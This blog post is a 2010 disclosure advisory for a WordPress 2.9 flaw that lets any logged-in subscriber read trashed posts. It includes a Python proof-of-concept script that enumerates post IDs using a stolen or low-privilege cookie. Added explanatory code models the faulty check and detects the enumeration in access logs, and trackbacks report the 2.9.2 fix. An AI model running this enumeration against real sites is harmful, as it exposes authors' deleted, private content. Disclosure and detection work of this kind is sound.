WordPress >= 2.9 Failure to Restrict URL Access
by tmac on Feb.13, 2010, under Hacks, Personal, Projects
Following on from the research I have been conducting, I have now released the following advisory, and it has been forwarded on to the correct people at WordPress.
WordPress >= 2.9 Failure to Restrict URL Access
http://www.thomasmackenzie.co.uk/
1. *Advisory Information*
Title: WordPress >= 2.9 Failure to Restrict URL Access
Date published: 13/02/2010
2. *Vulnerability Information*
Class: Failure to Restrict URL Access
Remotely Exploitable: Yes
Locally Exploitable: Yes
3. *Software Description*
WordPress is a state-of-the-art publishing platform with a
focus on aesthetics, web standards, and usability. WordPress
is both free and priceless at the same time. [0]
4. *Vulnerability Description*
Frequently, the only protection for a URL is that links to that page
are not presented to unauthorized users. Security by obscurity is
not sufficient to protect sensitive functions and data in an application.
Access control checks must be performed before a request to a sensitive
function is granted, which ensures that the user is authorized to access
that function. [1]
5. *Vulnerable packages*
Versions >= 2.9
6. *Non-vulnerable packages*
Versions < 2.9
7. *Vulnerability Overview*
Since version 2.9 a new feature was implemented so that users
were able to retrieve posts that they may have deleted by accident.
This new feature was labeled ‘trash’. Any posts placed in the trash are meant
to be viewable only by authenticated, privileged users.
8. *Technical Description*
When WordPress implemented the new feature they failed to change the
permissions granted while a post is in the trash. This means that
an unauthenticated user cannot see the post; however, any authenticated
user can, regardless of their privileges, even a ‘subscriber’.
“Subscriber [User Level 0] – Somebody who can read comments/comment/receive newsletters, etc.” [2]
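To make the authorization gap described in section 8 concrete, here is an added Python model (not WordPress's own code) of the view decision for a post fetched by ID, with the behaviour the advisory describes placed beside a hardened check. The role and capability names follow the Codex reference [2]; the reduced capability sets, the user/post dictionaries, the `audit()` helper and the sample users and posts are assumptions constructed for this example.

```python
# Added example (not WordPress's own code): a simplified model of the
# authorization decision the advisory describes, with the pre-fix behaviour
# beside a hardened one.  Role/capability names follow the Codex [2]; the
# reduced capability sets, the dict shapes and audit() are assumptions.

# Subset of WordPress's default role -> capability map (assumption: only the
# capabilities relevant to reading unpublished content are modelled).
ROLE_CAPS = {
    "subscriber": {"read"},
    "contributor": {"read", "edit_posts"},
    "author": {"read", "edit_posts", "publish_posts"},
    "editor": {"read", "edit_posts", "publish_posts", "edit_others_posts"},
    "administrator": {"read", "edit_posts", "publish_posts", "edit_others_posts"},
}

# Post statuses that must never be served to an arbitrary reader of /?p=<id>.
# 'trash' joined this set in 2.9, but the view check was not updated for it.
NON_PUBLIC_STATUSES = {"draft", "pending", "trash"}


def can_edit_post(user, post):
    """Per-post edit capability: own post with edit_posts, or any post with
    edit_others_posts.  An anonymous visitor (user is None) can edit nothing."""
    if user is None:
        return False
    caps = ROLE_CAPS[user["role"]]
    if "edit_others_posts" in caps:
        return True
    return "edit_posts" in caps and post["author"] == user["id"]


def can_view_post_vulnerable(user, post):
    """Behaviour described in section 8: drafts are gated on the edit
    capability, but a trashed post only asks 'is anyone logged in?'."""
    if post["status"] == "publish":
        return True
    if post["status"] == "trash":
        return user is not None          # authentication is the only check
    return can_edit_post(user, post)


def can_view_post_fixed(user, post):
    """Hardened check: every non-public status, trash included, requires the
    per-post edit capability; unknown statuses fail closed."""
    if post["status"] == "publish":
        return True
    if post["status"] in NON_PUBLIC_STATUSES:
        return can_edit_post(user, post)
    return False


def audit(users, posts, check):
    """Return the (user id, post id) pairs that `check` lets through for posts
    that are not published, so the two policies can be compared side by side.
    The anonymous visitor is reported as user id 0."""
    return sorted(
        (u["id"] if u else 0, p["id"])
        for u in users for p in posts
        if p["status"] != "publish" and check(u, p)
    )


# Constructed sample data (not from the advisory).
USERS = [
    None,                                   # anonymous visitor
    {"id": 7, "role": "subscriber"},
    {"id": 3, "role": "author"},            # author of the posts below
    {"id": 5, "role": "editor"},
]
POSTS = [
    {"id": 180, "author": 3, "status": "trash"},
    {"id": 181, "author": 3, "status": "draft"},
    {"id": 182, "author": 3, "status": "publish"},
]

if __name__ == "__main__":
    # The subscriber (id 7) appears only in the vulnerable policy's output.
    print("vulnerable:", audit(USERS, POSTS, can_view_post_vulnerable))
    print("fixed:     ", audit(USERS, POSTS, can_view_post_fixed))
```

The point the comparison makes is that "logged in" is not an authorization decision: the hardened check asks the same per-post question for a trashed post that it already asked for a draft, so a subscriber is refused while the post's author and an editor still see it.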
9. *PoC*
#!/usr/bin/python
#
# WordPress > 2.9 Failure to Restrict URL Access PoC
#
# This script iterates through the WP post IDs as an authenticated and unauthenticated user.
# If the requests differ a 'Trash' post has been found.
#
# You will need an authenticated user cookie of any privilege to run this script.
#
# Example cookie:
# wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
#
# Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types.
#
# Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

import httplib  # Python 2 standard library (http.client in Python 3)

# Declare vars
blogURL = "www.example.com"
userCookie = "enter_cookie_here"
postID = 0  # Leave at 0

conn = httplib.HTTPConnection(blogURL)
Headers = {"Cookie": userCookie}

print
print "Target = http://" + blogURL + "/?p=" + str(postID)
print

while 1:
    request = '/?p=' + str(postID)
    # Start non authenticated enumeration
    try:
        conn.request("GET", request)
        r1 = conn.getresponse()
        data1 = r1.read()
    except Exception:
        print "Connection error"
        break
    # Start authenticated enumeration
    try:
        conn.request("GET", request, None, Headers)
        r2 = conn.getresponse()
        data2 = r2.read()
    except Exception:
        print "Connection error"
        break
    # Compare the HTML body responses
    if data1 != data2:
        print "+ Found! http://" + blogURL + request
    else:
        print request
    postID += 1

conn.close()
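For site operators, the traffic the PoC above generates is easy to recognise in the web server's access log: one client walking `/?p=<id>` sequentially and requesting each ID twice. The following detection script is an added example and is not part of the advisory; the log format, the thresholds (`MIN_RUN`, `WINDOW`) and the synthetic log lines built by `constructed_log()` are all assumptions constructed for it.

```python
# Added example (not from the advisory): flag clients that enumerate post IDs
# the way the PoC does, from constructed Apache-style access log lines.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds are assumptions for this example; tune them to the site's traffic.
MIN_RUN = 20                    # consecutive post IDs fetched by one client
WINDOW = timedelta(minutes=10)  # ...within this much time

# Apache/nginx combined-style line, parsed down to status and response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
POST_ID_RE = re.compile(r'[?&]p=(\d+)(?=&|$)')


def parse_line(line):
    """Return (ip, timestamp, post_id, size) for a /?p=<id> request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = POST_ID_RE.search(m.group("path"))
    if not q:
        return None
    size = 0 if m.group("size") == "-" else int(m.group("size"))
    return (m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT),
            int(q.group(1)), size)


def longest_consecutive_run(ids):
    """Length of the longest run of consecutive integers among `ids`."""
    s = set(ids)
    best = 0
    for n in s:
        if n - 1 in s:
            continue                  # only count from the bottom of a run
        length = 1
        while n + length in s:
            length += 1
        best = max(best, length)
    return best


def find_enumerators(lines):
    """Flag clients whose requests within any WINDOW cover at least MIN_RUN
    consecutive post IDs.  Returns {ip: summary}.  The summary also lists IDs
    for which the same client received responses of differing sizes: that is
    what the PoC's unauthenticated/authenticated request pair looks like on
    the server side when a trashed post is being exposed."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec[0]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[1])
        best, start = 0, 0
        for end in range(len(recs)):          # sliding time window
            while recs[end][1] - recs[start][1] > WINDOW:
                start += 1
            best = max(best, longest_consecutive_run(r[2] for r in recs[start:end + 1]))
        if best < MIN_RUN:
            continue
        sizes = defaultdict(set)
        for _, _, post_id, size in recs:
            sizes[post_id].add(size)
        findings[ip] = {
            "run": best,
            "requests": len(recs),
            "ids_with_differing_sizes": sorted(p for p, s in sizes.items() if len(s) > 1),
        }
    return findings


def constructed_log():
    """Synthetic log lines (constructed for this example): one client walking
    IDs 0-24, each requested twice as the PoC does, with ID 17 standing in for
    a trashed post whose logged-in response is larger; plus a normal reader."""
    lines = []
    t0 = datetime(2010, 2, 13, 19, 18, 0)
    for i in range(25):
        ts = (t0 + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S") + " +0000"
        for size in ((2811, 9042) if i == 17 else (2811, 2811)):
            lines.append('203.0.113.9 - - [%s] "GET /?p=%d HTTP/1.1" 200 %d' % (ts, i, size))
    lines.append('198.51.100.4 - - [13/Feb/2010:19:20:05 +0000] "GET /?p=180 HTTP/1.1" 200 14231')
    lines.append('198.51.100.4 - - [13/Feb/2010:19:21:40 +0000] "GET /wp-login.php HTTP/1.1" 200 2110')
    return lines


if __name__ == "__main__":
    for ip, summary in find_enumerators(constructed_log()).items():
        print(ip, summary)
```

Run directly, it prints the single flagged client. The `ids_with_differing_sizes` field is worth correlating with the post table: a post that is served at two sizes to the same client within seconds is either genuinely changing or, on an unpatched 2.9/2.9.1 site, a trashed post that a logged-in account has just read.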
10. *Credits*
Thomas Mackenzie (tmacuk) – http://www.thomasmackenzie.co.uk/
Original finder and tester.
Ryan Dewhurst (ethicalhack3r) – http://www.ryandewhurst.co.uk/
PoC creation and analysis.
Arron Finnon (f1nux) – http://www.finux.co.co.uk/
Helped with documentation.
Matthew Hughes – http://www.matthewhughes.co.uk/
Helped with documentation.
Robin Wood (digininja) – http://www.digininja.org/
Helped identify the vulnerability type.
11. *References*
[0] http://wordpress.org/
[1] http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
[2] http://codex.wordpress.org/Roles_and_Capabilities
2 Comments for this entry
26 Trackbacks / Pingbacks for this entry
-
uberVU - social comments
February 13th, 2010 on 7:18 pm
Social comments and analytics for this post…
This post was mentioned on Twitter by tmacuk: WordPress >= 2.9 Failure to Restrict URL Access found – http://tmacuk.co.uk/?p=180...
-
WordPress >= 2.9 Failure to Restrict URL Access « tmacuk | Wordpress Marketing
February 13th, 2010 on 8:23 pm
[...] Read the original: WordPress >= 2.9 Failure to Restrict URL Access « tmacuk [...]
-
Most Tweeted Articles by Defcon Experts
February 15th, 2010 on 10:16 am
[...] new bug found in wordpress 2.9.1 [...]
-
WordPress 2.9.2 Released – Security Fix
February 15th, 2010 on 5:51 pm
[...] 2.9.2 was released just a few minutes ago to address a security problem dealing with the Trash feature. When WordPress implemented the new feature they failed to change [...]
-
Wordpress 2.9.2 Released | Netchunks
February 15th, 2010 on 7:08 pm
[...] WordPress 2.9.2 was released just an hour ago to address a security bug related to the trash feature. A Wordpress user alerted Wordpress about a problem where logged in [...]
-
Vulnerability in Wordpress 2.9 | ooo la la la la : ) HACKED ! by ! mOmiX ! Sory Security Team :(((
February 15th, 2010 on 8:01 pm
[...] Mackenzie has found a Failure to Restrict URL Access type bug in Wordpress 2.9 and later (but not in earlier versions) and has published a PoC at [...]
-
WordPress 2.9.2 « hep-cat.de
February 15th, 2010 on 8:42 pm
[...] under: Unauthorized — atari @ 9:42 pm WordPress 2.9.2 is available! Please update now. Thomas Mackenzie alerted us to a problem where logged in users can peek at trashed posts belonging to other authors. If you have untrusted [...]
-
WordPress Trashed Posts Security Bypass Vulnerability « Bug-Blog
February 16th, 2010 on 12:01 am
[...] ORIGINAL ADVISORY: http://tmacuk.co.uk/?p=180 [...]
-
WordPress >= 2.9 Failure to Restrict URL Access « tmacuk Mobile
February 16th, 2010 on 1:39 am
[...] WordPress >= 2.9 Failure to Restrict URL Access « tmacuk [...]
-
T. Longren
February 16th, 2010 on 4:11 am
WordPress 2.9.2…
WordPress 2.9.2 was released earlier today. You can download it here. This fixes a problem that allows users that are logged in to view trash posts authored by other users. Thomas Mackenzie alerted us to a problem where logged in users can peek at tras…
-
They can read your “Trash”
February 16th, 2010 on 6:57 am
[...] new flaw in the famous WordPress, discovered by researcher Thomas Mackenzie, would allow “any” person the articles, comments and pages that you have [...]
-
The short memory of WordPress.org security « hakre on wordpress
February 16th, 2010 on 10:18 am
[...] WordPress >= 2.9 Failure to Restrict URL Access (Feb. 13, 2010; by Thomas Mackenzie) – report by Thomas MacKenzie [...]
-
WordPress 2.9.2 Fixes a Security Vulnerability — Javamancy
February 16th, 2010 on 1:21 pm
[...] posts that belong to others, so sensitive or private information may be inappropriately accessible. Thomas Mackenzie first mentioned this on his blog a few days ago (with a lot of interesting details), and even posted a diff patch for [...]
-
WordPress Security is a Joke (2.9.2 Released) | WPblogger
February 16th, 2010 on 10:23 pm
[...] can read all the details over on Thomas Mackenzie’s blog but basically if you have any sensitive data in a post that you trashed or perhaps said something [...]
-
Security update 2.9.2 in Wordpress | Yo Binario
February 17th, 2010 on 10:45 am
[...] new security release is due to a bug affecting the 2.9.X branch, documented by Thomas Mackenzie on his blog; it is important to update to the new version 2.9.2, especially if there are users [...]
-
Script to read the trash in Wordpress :Luctus
February 17th, 2010 on 6:03 pm
[...] new flaw in the famous WordPress, discovered by researcher Thomas Mackenzie, would allow “any” person the articles, comments and pages that you have deleted and [...]
-
WordPress 2.9.2, or a somewhat “unnecessary” security update | Separatista
February 17th, 2010 on 10:07 pm
[...] security risk), until Thomas Mackenzie took it up, documented the whole problem in detail and sent it to the special e-mail address security@wordpress.org, which is intended precisely for [...]
-
WordPress Thrashing Authorisation Bypass
February 22nd, 2010 on 9:41 pm
[...] Thomas Mackenzie has reported a vulnerability affecting Wordpress >= 2.9. Versions before 2.9 are not vulnerable. [...]
-
Source N Code » Blog Archive » What is WordPress?
April 25th, 2010 on 11:58 am
[...] On February 13th 2010 Thomas Mackenzie released an advisory regarding a vulnerability of failing to restrict URL access. The advisory can be found at Thomas’s Blog [...]
February 20th, 2010 on 9:59 am
Very Good!
March 21st, 2010 on 4:49 pm
This fixes a problem that allows users that are logged in to view trash posts authored by other users. Thomas Mackenzie alerted us to a problem where logged in users can peek